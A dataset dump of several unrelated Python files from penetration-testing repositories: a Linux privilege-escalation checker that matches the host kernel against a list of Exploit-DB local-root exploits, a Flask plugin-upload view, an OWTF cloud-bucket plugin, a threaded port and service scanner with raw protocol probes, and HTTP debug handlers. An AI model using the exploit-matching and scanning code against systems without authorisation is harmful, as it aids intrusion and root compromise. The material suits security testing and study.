for result in devTools["TOOLS"]["results"]:
if cmd in result:
for item in escapeCmd[cmd]:
print " " + cmd + "-->\t" + item
print
print "[*] FINDING RELEVENT PRIVILEGE ESCALATION EXPLOITS...\n"
# Now check for relevant exploits (note: this list should be updated over time; source: Exploit-DB)
# sploit format = sploit name : {minversion, maxversion, exploitdb#, language, {keywords for applicability}} -- current keywords are 'kernel', 'proc', 'pkg' (unused), and 'os'
sploits= { "2.2.x-2.4.x ptrace kmod local exploit":{"minver":"2.2", "maxver":"2.4.99", "exploitdb":"3", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}},
"< 2.4.20 Module Loader Local Root Exploit":{"minver":"0", "maxver":"2.4.20", "exploitdb":"12", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}},
"2.4.22 "'do_brk()'" local Root Exploit (PoC)":{"minver":"2.4.22", "maxver":"2.4.22", "exploitdb":"129", "lang":"asm", "keywords":{"loc":["kernel"], "val":"kernel"}},
"<= 2.4.22 (do_brk) Local Root Exploit (working)":{"minver":"0", "maxver":"2.4.22", "exploitdb":"131", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}},
"2.4.x mremap() bound checking Root Exploit":{"minver":"2.4", "maxver":"2.4.99", "exploitdb":"145", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}},
"<= 2.4.29-rc2 uselib() Privilege Elevation":{"minver":"0", "maxver":"2.4.29", "exploitdb":"744", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}},
"2.4 uselib() Privilege Elevation Exploit":{"minver":"2.4", "maxver":"2.4", "exploitdb":"778", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}},
"2.4.x / 2.6.x uselib() Local Privilege Escalation Exploit":{"minver":"2.4", "maxver":"2.6.99", "exploitdb":"895", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}},
"2.4/2.6 bluez Local Root Privilege Escalation Exploit (update)":{"minver":"2.4", "maxver":"2.6.99", "exploitdb":"926", "lang":"c", "keywords":{"loc":["proc","pkg"], "val":"bluez"}},
"<= 2.6.11 (CPL 0) Local Root Exploit (k-rad3.c)":{"minver":"0", "maxver":"2.6.11", "exploitdb":"1397", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}},
"MySQL 4.x/5.0 User-Defined Function Local Privilege Escalation Exploit":{"minver":"0", "maxver":"99", "exploitdb":"1518", "lang":"c", "keywords":{"loc":["proc","pkg"], "val":"mysql"}},
"2.6.13 <= 2.6.17.4 sys_prctl() Local Root Exploit":{"minver":"2.6.13", "maxver":"2.6.17.4", "exploitdb":"2004", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}},
"2.6.13 <= 2.6.17.4 sys_prctl() Local Root Exploit (2)":{"minver":"2.6.13", "maxver":"2.6.17.4", "exploitdb":"2005", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}},
"2.6.13 <= 2.6.17.4 sys_prctl() Local Root Exploit (3)":{"minver":"2.6.13", "maxver":"2.6.17.4", "exploitdb":"2006", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}},
"2.6.13 <= 2.6.17.4 sys_prctl() Local Root Exploit (4)":{"minver":"2.6.13", "maxver":"2.6.17.4", "exploitdb":"2011", "lang":"sh", "keywords":{"loc":["kernel"], "val":"kernel"}},
"<= 2.6.17.4 (proc) Local Root Exploit":{"minver":"0", "maxver":"2.6.17.4", "exploitdb":"2013", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}},
"2.6.13 <= 2.6.17.4 prctl() Local Root Exploit (logrotate)":{"minver":"2.6.13", "maxver":"2.6.17.4", "exploitdb":"2031", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}},
"Ubuntu/Debian Apache 1.3.33/1.3.34 (CGI TTY) Local Root Exploit":{"minver":"4.10", "maxver":"7.04", "exploitdb":"3384", "lang":"c", "keywords":{"loc":["os"], "val":"debian"}},
"Linux/Kernel 2.4/2.6 x86-64 System Call Emulation Exploit":{"minver":"2.4", "maxver":"2.6", "exploitdb":"4460", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}},
"< 2.6.11.5 BLUETOOTH Stack Local Root Exploit":{"minver":"0", "maxver":"2.6.11.5", "exploitdb":"4756", "lang":"c", "keywords":{"loc":["proc","pkg"], "val":"bluetooth"}},
"2.6.17 - 2.6.24.1 vmsplice Local Root Exploit":{"minver":"2.6.17", "maxver":"2.6.24.1", "exploitdb":"5092", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}},
"2.6.23 - 2.6.24 vmsplice Local Root Exploit":{"minver":"2.6.23", "maxver":"2.6.24", "exploitdb":"5093", "lang":"c", "keywords":{"loc":["os"], "val":"debian"}},
"Debian OpenSSL Predictable PRNG Bruteforce SSH Exploit":{"minver":"0", "maxver":"99", "exploitdb":"5720", "lang":"python", "keywords":{"loc":["os"], "val":"debian"}},
"Linux Kernel < 2.6.22 ftruncate()/open() Local Exploit":{"minver":"0", "maxver":"2.6.22", "exploitdb":"6851", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}},
"< 2.6.29 exit_notify() Local Privilege Escalation Exploit":{"minver":"0", "maxver":"2.6.29", "exploitdb":"8369", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}},
"2.6 UDEV Local Privilege Escalation Exploit":{"minver":"2.6", "maxver":"2.6.99", "exploitdb":"8478", "lang":"c", "keywords":{"loc":["proc","pkg"], "val":"udev"}},
"2.6 UDEV < 141 Local Privilege Escalation Exploit":{"minver":"2.6", "maxver":"2.6.99", "exploitdb":"8572", "lang":"c", "keywords":{"loc":["proc","pkg"], "val":"udev"}},
"2.6.x ptrace_attach Local Privilege Escalation Exploit":{"minver":"2.6", "maxver":"2.6.99", "exploitdb":"8673", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}},
"2.6.29 ptrace_attach() Local Root Race Condition Exploit":{"minver":"2.6.29", "maxver":"2.6.29", "exploitdb":"8678", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}},
"Linux Kernel <=2.6.28.3 set_selection() UTF-8 Off By One Local Exploit":{"minver":"0", "maxver":"2.6.28.3", "exploitdb":"9083", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}},
"Test Kernel Local Root Exploit 0day":{"minver":"2.6.18", "maxver":"2.6.30", "exploitdb":"9191", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}},
"PulseAudio (setuid) Priv. Escalation Exploit (ubu/9.04)(slack/12.2.0)":{"minver":"2.6.9", "maxver":"2.6.30", "exploitdb":"9208", "lang":"c", "keywords":{"loc":["pkg"], "val":"pulse"}},
"2.x sock_sendpage() Local Ring0 Root Exploit":{"minver":"2", "maxver":"2.99", "exploitdb":"9435", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}},
"2.x sock_sendpage() Local Root Exploit 2":{"minver":"2", "maxver":"2.99", "exploitdb":"9436", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}},
"2.4/2.6 sock_sendpage() ring0 Root Exploit (simple ver)":{"minver":"2.4", "maxver":"2.6.99", "exploitdb":"9479", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}},
"2.6 < 2.6.19 (32bit) ip_append_data() ring0 Root Exploit":{"minver":"2.6", "maxver":"2.6.19", "exploitdb":"9542", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}},
"2.4/2.6 sock_sendpage() Local Root Exploit (ppc)":{"minver":"2.4", "maxver":"2.6.99", "exploitdb":"9545", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}},
"< 2.6.19 udp_sendmsg Local Root Exploit (x86/x64)":{"minver":"0", "maxver":"2.6.19", "exploitdb":"9574", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}},
"< 2.6.19 udp_sendmsg Local Root Exploit":{"minver":"0", "maxver":"2.6.19", "exploitdb":"9575", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}},
"2.4/2.6 sock_sendpage() Local Root Exploit [2]":{"minver":"2.4", "maxver":"2.6.99", "exploitdb":"9598", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}},
"2.4/2.6 sock_sendpage() Local Root Exploit [3]":{"minver":"2.4", "maxver":"2.6.99", "exploitdb":"9641", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}},
"2.4.1-2.4.37 and 2.6.1-2.6.32-rc5 Pipe.c Privelege Escalation":{"minver":"2.4.1", "maxver":"2.6.32", "exploitdb":"9844", "lang":"python", "keywords":{"loc":["kernel"], "val":"kernel"}},
"'pipe.c' Local Privilege Escalation Vulnerability":{"minver":"2.4.1", "maxver":"2.6.32", "exploitdb":"10018", "lang":"sh", "keywords":{"loc":["kernel"], "val":"kernel"}},
"2.6.18-20 2009 Local Root Exploit":{"minver":"2.6.18", "maxver":"2.6.20", "exploitdb":"10613", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}},
"Apache Spamassassin Milter Plugin Remote Root Command Execution":{"minver":"0", "maxver":"99", "exploitdb":"11662", "lang":"sh", "keywords":{"loc":["proc"], "val":"spamass-milter"}},
"<= 2.6.34-rc3 ReiserFS xattr Privilege Escalation":{"minver":"0", "maxver":"2.6.34", "exploitdb":"12130", "lang":"python", "keywords":{"loc":["mnt"], "val":"reiser"}},
"Ubuntu PAM MOTD local root":{"minver":"7", "maxver":"10.04", "exploitdb":"14339", "lang":"sh", "keywords":{"loc":["os"], "val":"ubuntu"}},
"< 2.6.36-rc1 CAN BCM Privilege Escalation Exploit":{"minver":"0", "maxver":"2.6.36", "exploitdb":"14814", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}},
"Kernel ia32syscall Emulation Privilege Escalation":{"minver":"0", "maxver":"99", "exploitdb":"15023", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}},
"Linux RDS Protocol Local Privilege Escalation":{"minver":"0", "maxver":"2.6.36", "exploitdb":"15285", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}},
"<= 2.6.37 Local Privilege Escalation":{"minver":"0", "maxver":"2.6.37", "exploitdb":"15704", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}},
"< 2.6.37-rc2 ACPI custom_method Privilege Escalation":{"minver":"0", "maxver":"2.6.37", "exploitdb":"15774", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}},
"CAP_SYS_ADMIN to root Exploit":{"minver":"0", "maxver":"99", "exploitdb":"15916", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}},
"CAP_SYS_ADMIN to Root Exploit 2 (32 and 64-bit)":{"minver":"0", "maxver":"99", "exploitdb":"15944", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}},
"< 2.6.36.2 Econet Privilege Escalation Exploit":{"minver":"0", "maxver":"2.6.36.2", "exploitdb":"17787", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}},
"Sendpage Local Privilege Escalation":{"minver":"0", "maxver":"99", "exploitdb":"19933", "lang":"ruby", "keywords":{"loc":["kernel"], "val":"kernel"}},
"2.4.18/19 Privileged File Descriptor Resource Exhaustion Vulnerability":{"minver":"2.4.18", "maxver":"2.4.19", "exploitdb":"21598", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}},
"2.2.x/2.4.x Privileged Process Hijacking Vulnerability (1)":{"minver":"2.2", "maxver":"2.4.99", "exploitdb":"22362", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}},
"2.2.x/2.4.x Privileged Process Hijacking Vulnerability (2)":{"minver":"2.2", "maxver":"2.4.99", "exploitdb":"22363", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}},
"Samba 2.2.8 Share Local Privilege Elevation Vulnerability":{"minver":"2.2.8", "maxver":"2.2.8", "exploitdb":"23674", "lang":"c", "keywords":{"loc":["proc","pkg"], "val":"samba"}},
"open-time Capability file_ns_capable() - Privilege Escalation Vulnerability":{"minver":"0", "maxver":"99", "exploitdb":"25307", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}},
"open-time Capability file_ns_capable() Privilege Escalation":{"minver":"0", "maxver":"99", "exploitdb":"25450", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}},
}
# variable declaration
os = sysInfo["OS"]["results"][0]
version = sysInfo["KERNEL"]["results"][0].split(" ")[2].split("-")[0]
langs = devTools["TOOLS"]["results"]
procs = getAppProc["PROCS"]["results"]
kernel = str(sysInfo["KERNEL"]["results"][0])
mount = driveInfo["MOUNT"]["results"]
#pkgs = getAppProc["PKGS"]["results"] # currently not using packages for sploit appicability but my in future
# lists to hold ranked, applicable sploits
# note: this is a best-effort, basic ranking designed to help in prioritizing priv escalation exploit checks
# all applicable exploits should be checked and this function could probably use some improvement
avgprob = []
highprob = []
for sploit in sploits:
lang = 0 # use to rank applicability of sploits
keyword = sploits[sploit]["keywords"]["val"]
sploitout = sploit + " || " + "http://www.exploit-db.com/exploits/" + sploits[sploit]["exploitdb"] + " || " + "Language=" + sploits[sploit]["lang"]
# first check for kernell applicability
if (version >= sploits[sploit]["minver"]) and (version <= sploits[sploit]["maxver"]):
# next check language applicability
if (sploits[sploit]["lang"] == "c") and (("gcc" in str(langs)) or ("cc" in str(langs))):
lang = 1 # language found, increase applicability score
elif sploits[sploit]["lang"] == "sh":
lang = 1 # language found, increase applicability score
elif (sploits[sploit]["lang"] in str(langs)):
lang = 1 # language found, increase applicability score
if lang == 0:
sploitout = sploitout + "**" # added mark if language not detected on system
# next check keyword matches to determine if some sploits have a higher probability of success
for loc in sploits[sploit]["keywords"]["loc"]:
if loc == "proc":
for proc in procs:
if keyword in proc:
highprob.append(sploitout) # if sploit is associated with a running process consider it a higher probability/applicability
break
break
elif loc == "os":
if (keyword in os) or (keyword in kernel):
highprob.append(sploitout) # if sploit is specifically applicable to this OS consider it a higher probability/applicability
break
elif loc == "mnt":
if keyword in mount:
highprob.append(sploitout) # if sploit is specifically applicable to a mounted file system consider it a higher probability/applicability
break
else:
avgprob.append(sploitout) # otherwise, consider average probability/applicability based only on kernel version
print " Note: Exploits relying on a compile/scripting language not detected on this system are marked with a '**' but should still be tested!"
print
print " The following exploits are ranked higher in probability of success because this script detected a related running process, OS, or mounted file system"
for exploit in highprob:
print " - " + exploit
print
print " The following exploits are applicable to this kernel version and should be investigated as well"
for exploit in avgprob:
print " - " + exploit
print
print "Finished"
print bigline
| 66.742627 | 248 | 0.615071 |
PenetrationTestingScripts | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Author : jeffzhang
# @Time : 18-5-14
# @File : plugin_management.py
# @Desc : ""
import time
import os
from flask import Flask, Blueprint, render_template, request, jsonify
from werkzeug.utils import secure_filename
from bson import ObjectId
from lib.mongo_db import connectiondb, db_name_conf
from fuxi.views.authenticate import login_check
from fuxi.views.modules.scanner.parse_plugin import parse_plugin
from instance import config
ProductionConfig = config.ProductionConfig
app = Flask(__name__)
app.config.from_object(ProductionConfig)
plugin_management = Blueprint('plugin_management', __name__)
tasks_db = db_name_conf()['tasks_db']
asset_db = db_name_conf()['asset_db']
server_db = db_name_conf()['server_db']
subdomain_db = db_name_conf()['subdomain_db']
vul_db = db_name_conf()['vul_db']
plugin_db = db_name_conf()['plugin_db']
# new plugin
@plugin_management.route('/new-asset', methods=['GET', 'POST'])
@login_check
def new_plugin():
pass
@plugin_management.route('/plugin-management', methods=['GET', 'POST'])
@login_check
def plugin_view():
# delete plugin
if request.method == "GET":
if request.args.get("delete"):
plugin_id = request.args.get('delete')
plugin_filename = connectiondb(plugin_db).find_one({"_id": ObjectId(plugin_id)})['plugin_filename']
if connectiondb(plugin_db).delete_one({'_id': ObjectId(plugin_id)}):
try:
os.remove(plugin_filename)
except Exception as e:
raise e
return "success"
else:
return "Warning"
# get plugin info
elif request.args.get("info"):
plugin_id = request.args.get('info')
plugin_info_data = connectiondb(plugin_db).find_one({'_id': ObjectId(plugin_id)})
del plugin_info_data['_id']
if plugin_info_data:
return jsonify(plugin_info_data)
else:
return jsonify({"result": "Warning"})
else:
# default view
plugin_info = connectiondb(plugin_db).find()
return render_template("plugin-management.html", plugin_info=plugin_info)
@plugin_management.route('/plugin-upload', methods=['GET', 'POST'])
@login_check
def plugin_upload():
file_path = app.config.get('POCSUITE_PATH')
file_data = request.files['file']
if file_data:
file_name = "_" + time.strftime("%y%m%d", time.localtime()) + "_" + secure_filename(file_data.filename)
save_path = file_path + file_name
file_data.save(save_path)
try:
new_plugin_info = parse_plugin(save_path)
if new_plugin_info:
db_insert = connectiondb(plugin_db).insert_one(new_plugin_info).inserted_id
if db_insert:
return jsonify({"result": "success"})
else:
return jsonify({"result": "Warning"})
except Exception as e:
print(e)
return "Warning"
| 33.388889 | 111 | 0.603749 |
owtf | """
ACTIVE Plugin for Testing for Open GCP Buckets(OWASP-CL-002)
"""
from owtf.managers.resource import get_resources
from owtf.plugin.helper import plugin_helper
DESCRIPTION = "GCPBucketBrute for Open GCP Buckets"
def run(PluginInfo):
resource = get_resources("ActiveOpenGCPBuckets")
# GCPBrute works better when we use Second Level Domain]
domain = resource[0][1]
# Extract Second Level Domain
extract_sld = domain.rsplit(".", 1)
# Replace it in the resource
resource[0][1] = extract_sld[0]
Content = plugin_helper.resource_linklist("Online Resources", resource)
return Content
| 26.086957 | 75 | 0.721865 |
PenetrationTestingScripts | #coding=utf-8
__author__ = 'wilson'
import sys
sys.path.append("../")
from comm.config import *
from comm.printers import printPink,printRed,printGreen
import threading
from threading import Thread
from Queue import Queue
import platform
from subprocess import Popen, PIPE
import re
import time
import socket
socket.setdefaulttimeout(10) #设置了全局默认超时时间
class portscan():
"""docstring for ClassName"""
def __init__(self,c,user_ports):
self.config=c
self.PROBES =[
'\r\n\r\n',
'GET / HTTP/1.0\r\n\r\n',
'GET / \r\n\r\n',
'\x01\x00\x00\x00\x01\x00\x00\x00\x08\x08',
'\x80\0\0\x28\x72\xFE\x1D\x13\0\0\0\0\0\0\0\x02\0\x01\x86\xA0\0\x01\x97\x7C\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',
'\x03\0\0\x0b\x06\xe0\0\0\0\0\0',
'\0\0\0\xa4\xff\x53\x4d\x42\x72\0\0\0\0\x08\x01\x40\0\0\0\0\0\0\0\0\0\0\0\0\0\0\x40\x06\0\0\x01\0\0\x81\0\x02PC NETWORK PROGRAM 1.0\0\x02MICROSOFT NETWORKS 1.03\0\x02MICROSOFT NETWORKS 3.0\0\x02LANMAN1.0\0\x02LM1.2X002\0\x02Samba\0\x02NT LANMAN 1.0\0\x02NT LM 0.12\0',
'\x80\x9e\x01\x03\x01\x00u\x00\x00\x00 \x00\x00f\x00\x00e\x00\x00d\x00\x00c\x00\x00b\x00\x00:\x00\x009\x00\x008\x00\x005\x00\x004\x00\x003\x00\x002\x00\x00/\x00\x00\x1b\x00\x00\x1a\x00\x00\x19\x00\x00\x18\x00\x00\x17\x00\x00\x16\x00\x00\x15\x00\x00\x14\x00\x00\x13\x00\x00\x12\x00\x00\x11\x00\x00\n\x00\x00\t\x00\x00\x08\x00\x00\x06\x00\x00\x05\x00\x00\x04\x00\x00\x03\x07\x00\xc0\x06\x00@\x04\x00\x80\x03\x00\x80\x02\x00\x80\x01\x00\x80\x00\x00\x02\x00\x00\x01\xe4i<+\xf6\xd6\x9b\xbb\xd3\x81\x9f\xbf\x15\xc1@\xa5o\x14,M \xc4\xc7\xe0\xb6\xb0\xb2\x1f\xf9)\xe8\x98',
'\x16\x03\0\0S\x01\0\0O\x03\0?G\xd7\xf7\xba,\xee\xea\xb2`~\xf3\0\xfd\x82{\xb9\xd5\x96\xc8w\x9b\xe6\xc4\xdb<=\xdbo\xef\x10n\0\0(\0\x16\0\x13\0\x0a\0f\0\x05\0\x04\0e\0d\0c\0b\0a\0`\0\x15\0\x12\0\x09\0\x14\0\x11\0\x08\0\x06\0\x03\x01\0',
'< NTP/1.2 >\n',
'< NTP/1.1 >\n',
'< NTP/1.0 >\n',
'\0Z\0\0\x01\0\0\0\x016\x01,\0\0\x08\0\x7F\xFF\x7F\x08\0\0\0\x01\0 \0:\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\04\xE6\0\0\0\x01\0\0\0\0\0\0\0\0(CONNECT_DATA=(COMMAND=version))',
'\x12\x01\x00\x34\x00\x00\x00\x00\x00\x00\x15\x00\x06\x01\x00\x1b\x00\x01\x02\x00\x1c\x00\x0c\x03\x00\x28\x00\x04\xff\x08\x00\x01\x55\x00\x00\x00\x4d\x53\x53\x51\x4c\x53\x65\x72\x76\x65\x72\x00\x48\x0f\x00\x00',
'\0\0\0\0\x44\x42\x32\x44\x41\x53\x20\x20\x20\x20\x20\x20\x01\x04\0\0\0\x10\x39\x7a\0\x01\0\0\0\0\0\0\0\0\0\0\x01\x0c\0\0\0\0\0\0\x0c\0\0\0\x0c\0\0\0\x04',
'\x01\xc2\0\0\0\x04\0\0\xb6\x01\0\0\x53\x51\x4c\x44\x42\x32\x52\x41\0\x01\0\0\x04\x01\x01\0\x05\0\x1d\0\x88\0\0\0\x01\0\0\x80\0\0\0\x01\x09\0\0\0\x01\0\0\x40\0\0\0\x01\x09\0\0\0\x01\0\0\x40\0\0\0\x01\x08\0\0\0\x04\0\0\x40\0\0\0\x01\x04\0\0\0\x01\0\0\x40\0\0\0\x40\x04\0\0\0\x04\0\0\x40\0\0\0\x01\x04\0\0\0\x04\0\0\x40\0\0\0\x01\x04\0\0\0\x04\0\0\x40\0\0\0\x01\x04\0\0\0\x02\0\0\x40\0\0\0\x01\x04\0\0\0\x04\0\0\x40\0\0\0\x01\0\0\0\0\x01\0\0\x40\0\0\0\0\x04\0\0\0\x04\0\0\x80\0\0\0\x01\x04\0\0\0\x04\0\0\x80\0\0\0\x01\x04\0\0\0\x03\0\0\x80\0\0\0\x01\x04\0\0\0\x04\0\0\x80\0\0\0\x01\x08\0\0\0\x01\0\0\x40\0\0\0\x01\x04\0\0\0\x04\0\0\x40\0\0\0\x01\x10\0\0\0\x01\0\0\x80\0\0\0\x01\x10\0\0\0\x01\0\0\x80\0\0\0\x01\x04\0\0\0\x04\0\0\x40\0\0\0\x01\x09\0\0\0\x01\0\0\x40\0\0\0\x01\x09\0\0\0\x01\0\0\x80\0\0\0\x01\x04\0\0\0\x03\0\0\x80\0\0\0\x01\0\0\0\0\0\0\0\0\0\0\0\0\x01\x04\0\0\x01\0\0\x80\0\0\0\x01\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\x01\0\0\x40\0\0\0\x01\0\0\0\0\x01\0\0\x40\0\0\0\0\x20\x20\x20\x20\x20\x20\x20\x20\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\x01\0\xff\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\xe4\x04\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\x7f',
'\x41\0\0\0\x3a\x30\0\0\xff\xff\xff\xff\xd4\x07\0\0\0\0\0\0test.$cmd\0\0\0\0\0\xff\xff\xff\xff\x1b\0\0\0\x01serverStatus\0\0\0\0\0\0\0\xf0\x3f\0'
]
self.SIGNS =self.config.file2list("conf/signs.conf")
self.ports=[]
self.getports(user_ports)
self.lock = threading.Lock()
self.pinglist=[]
self.q=Queue()
self.sp=Queue()
self.signs=self.prepsigns()
self.ipdict={}
self.ipdict['ldap']=[]
self.ipdict['mysql']=[]
self.ipdict['mssql']=[]
self.ipdict['ftp']=[]
self.ipdict['ssh']=[]
self.ipdict['smb']=[]
self.ipdict['vnc']=[]
self.ipdict['pop3']=[]
self.ipdict['rsync']=[]
self.ipdict['http']=[]
self.ipdict['https']=[]
self.ipdict['mongodb']=[]
self.ipdict['postgres']=[]
self.ipdict['redis']=[]
self.ipdict['ssl']=[]
self.ipdict['Unknown']=[]
#获取扫描端口列表
def getports(self,user_ports):
if user_ports=='':
self.ports=[21,22,23,80,81,443,389,445,843,873,1043,1099,1194,1433,1434,1521,2601,2604,3306,3307,3128,3389,3812,4440,4848,5432,5900,5901,5902,5903,6082,6000,6379,7001,7002,8080,8181,8888,8090,8000,8008,8009,8081,8088,8089,9000,9080,9043,9090,9091,9200,9528,10000,11211,10022,15000,16000,22022,22222,27017,28017,17017,18017,11321,50060]
else:
try:
if user_ports.find(",")>0:
for port in user_ports.split(','):
self.ports.append(int(port))
elif user_ports.find("-")>0:
startport=int(user_ports.split('-')[0])
endport=int(user_ports.split('-')[1])
for i in xrange(startport,endport+1):
self.ports.append(i)
else:
self.ports.append(int(user_ports))
except :
printRed('[!] not a valid ports given. you should put ip like 22,80,1433 or 22-1000')
exit()
#ping扫描函数
def pinger(self):
while True:
ip=self.q.get()
if platform.system()=='Linux':
p=Popen(['ping','-c 2',ip],stdout=PIPE)
m = re.search('(\d)\sreceived', p.stdout.read())
try:
if m.group(1)!='0':
self.pinglist.append(ip)
self.lock.acquire()
printRed("%s is live!!\r\n" % ip)
self.lock.release()
except:pass
if platform.system()=='Darwin':
import commands
p=commands.getstatusoutput("ping -c 2 "+ip)
m = re.findall('ttl', p[1])
try:
if m:
self.pinglist.append(ip)
self.lock.acquire()
printRed("%s is live!!\r\n" % ip)
self.lock.release()
except:pass
if platform.system()=='Windows':
p=Popen('ping -n 2 ' + ip, stdout=PIPE)
m = re.findall('TTL', p.stdout.read())
if m:
self.pinglist.append(ip)
self.lock.acquire()
printRed("%s is live!!\r\n" % ip)
self.lock.release()
self.q.task_done()
def pingscan(self,isping,threads,ips):
starttime=time.time()
friststarttime=time.time()
print "[*] start Scanning at %s" % time.ctime()
#isping=='no' 就禁ping扫描
#默认ping 扫描
if isping=='yes':
print "Scanning for live machines..."
for i in xrange(threads):
t = Thread(target=self.pinger)
t.setDaemon(True)
t.start()
for ip in ips:
self.q.put(ip)
self.q.join()
else:
self.pinglist=ips
if len(self.pinglist)==0:
print "not find any live machine - -|||"
exit()
print "[*] Scanning for live machines done,it has Elapsed time:%s " % (time.time()-starttime)
def prepsigns(self):
signlist=[]
for item in self.SIGNS:
(label,pattern)=item.split('|',2)
sign=(label,pattern)
signlist.append(sign)
return signlist
def matchbanner(self,banner,slist):
#print banner
for item in slist:
p=re.compile(item[1])
#print item[1]
if p.search(banner)!=None:
return item[0]
return 'Unknown'
#扫端口及其对应服务类型函数
def scanports(self):
while True:
ip,port=self.sp.get()
#print ip,port
s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
#判断端口的服务类型
service='Unknown'
try:
s.connect((ip,port))
except:
self.sp.task_done()
continue
try:
result = s.recv(256)
service=self.matchbanner(result,self.signs)
except:
for probe in self.PROBES:
#print probe
try:
s.close()
sd=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sd.settimeout(5)
sd.connect((ip,port))
sd.send(probe)
except:
continue
try:
result=sd.recv(256)
service=self.matchbanner(result,self.signs)
if service!='Unknown':
break
except:
continue
if service not in self.ipdict:
self.ipdict[service]=[]
self.ipdict[service].append(ip+':'+str(port))
self.lock.acquire()
printRed("%s opening %s\r\n" %(ip,port))
self.lock.release()
else:
self.ipdict[service].append(ip+':'+str(port))
self.lock.acquire()
printRed("%s opening %s\r\n" %(ip,port))
self.lock.release()
self.sp.task_done()
def portsscan(self,threads,file):
print "Scanning ports now..."
print "[*] start Scanning live machines' ports at %s" % time.ctime()
starttime=time.time()
for i in xrange(threads):
st=Thread(target=self.scanports)
st.setDaemon(True)
st.start()
for scanip in self.pinglist:
for port in self.ports:
self.sp.put((scanip,port))
self.sp.join()
print "[*] Scanning ports done,it has Elapsed time:%s " % (time.time()-starttime)
#将服务端口 信息 记录文件
for name in self.ipdict.keys():
if len(self.ipdict[name]):
contents=str(name)+' service has:\n'+' '+str(self.ipdict[name])+'\n'
self.config.write_file(contents=contents,file=file)
#处理没有识别的服务
def handleunknown(self):
for ip in self.ipdict['Unknown']:
#print ip
try:
if str(ip).split(':')[1]=='389':
self.ipdict['ldap'].append(ip)
if str(ip).split(':')[1]=='445':
self.ipdict['smb'].append(ip)
if str(ip).split(':')[1] in ['3306','3307','3308','3309']:
self.ipdict['mysql'].append(ip)
if str(ip).split(':')[1]=='1433':
self.ipdict['mssql'].append(ip)
if str(ip).split(':')[1] in ['10022','22']:
self.ipdict['ssh'].append(ip)
if str(ip).split(':')[1]=='27017':
self.ipdict['mongodb'].append(ip)
if str(ip).split(':')[1]=='110':
self.ipdict['pop3'].append(ip)
if str(ip).split(':')[1]=='5432':
self.ipdict['postgres'].append(ip)
if str(ip).split(':')[1]=='443':
self.ipdict['ssl'].append(ip)
if str(ip).split(':')[1]=='873':
self.ipdict['rsync'].append(ip)
if str(ip).split(':')[1]=='6379':
self.ipdict['redis'].append(ip)
# if str(ip).split(':')[1]=='21':
# self.ipdict['ftp'].append(ip)
except Exception as e:
print e
#处理被识别为http的mongo
for ip in self.ipdict['http']:
if str(ip).split(':')[1]=='27017':
self.ipdict['http'].remove(ip)
self.ipdict['mongodb'].append(ip)
def run(self,isping,threads,ips,file):
self.pingscan(isping,threads,ips)
self.portsscan(threads,file)
self.handleunknown()
| 39.59322 | 1,173 | 0.542843 |
PenetrationTestingScripts | import logging
from _response import response_seek_wrapper
from _urllib2_fork import BaseHandler
class HTTPResponseDebugProcessor(BaseHandler):
handler_order = 900 # before redirections, after everything else
def http_response(self, request, response):
if not hasattr(response, "seek"):
response = response_seek_wrapper(response)
info = logging.getLogger("mechanize.http_responses").info
try:
info(response.read())
finally:
response.seek(0)
info("*****************************************************")
return response
https_response = http_response
class HTTPRedirectDebugProcessor(BaseHandler):
def http_request(self, request):
if hasattr(request, "redirect_dict"):
info = logging.getLogger("mechanize.http_redirects").info
info("redirecting to %s", request.get_full_url())
